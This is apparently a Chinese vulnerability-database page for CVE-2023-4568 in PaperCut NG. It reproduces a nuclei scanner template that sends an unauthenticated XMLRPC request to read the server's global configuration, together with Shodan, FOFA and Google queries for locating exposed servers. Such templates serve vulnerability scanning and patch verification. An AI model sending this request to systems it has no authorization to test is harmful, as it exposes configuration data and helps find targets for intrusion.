CVE-2023-4568: PaperCut NG Unauthenticated XMLRPC Functionality

日期: 2025-08-01 | 影响软件: PaperCut NG | POC: 已公开

漏洞描述

PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.

PoC代码[已公开]

id: CVE-2023-4568

info:
  name: PaperCut NG Unauthenticated XMLRPC Functionality
  author: DhiyaneshDK
  severity: medium
  description: |
    PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.
  impact: |
    Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4568
    - https://www.tenable.com/security/research/tra-2023-31
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-4568
    cwe-id: CWE-287
    epss-score: 0.83198
    epss-percentile: 0.99222
    cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: papercut
    product: papercut_ng
    shodan-query:
      - html:"content=\"PaperCut\""
      - http.html:'content="papercut'
      - cpe:"cpe:2.3:a:papercut:papercut_ng"
      - http.html:"content=\"papercut\""
    fofa-query:
      - body='content="papercut'
      - body="content=\"papercut\""
    google-query: html:'content="papercut'
  tags: cve2023,cve,unauth,papercut

http:
  - raw:
      - |
        POST /rpc/clients/xmlrpc HTTP/1.1
        Host: {{Hostname}}
        Content-Type:text/xml

        <?xml version="1.0"?><methodCall><methodName>client.getGlobalConfig</methodName><params><param><value><string>str1</string></value></param><param><value><string>str2</string></value></param></params></methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'conf.ssl-port'
          - 'conf.auth-ttl-default'
        condition: and

      - type: word
        part: header
        words:
          - text/xml

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ea30e55bedf6a0d16be86114b6e23f4163f753126b73d8afa7eded52e286791202203e4907db8970571bfbb8bbbee6c31dd3e4e00ba851f8f5c9c85ebfb432c6be66:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-4568.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

PaperCut NG 允许运行未经身份验证的 XMLRPC 命令(CVE-2023-4568) 无POC

Papercut NG/MF CVE-2023-39469 代码注入漏洞 无POC

PaperCut NG 未授权XMLRPC命令执行漏洞 无POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637） 无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358） 无POC

Papercut NG/MF CVE-2023-39469 代码注入漏洞无POC

PaperCut NG 未授权XMLRPC命令执行漏洞无POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637）无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358）无POC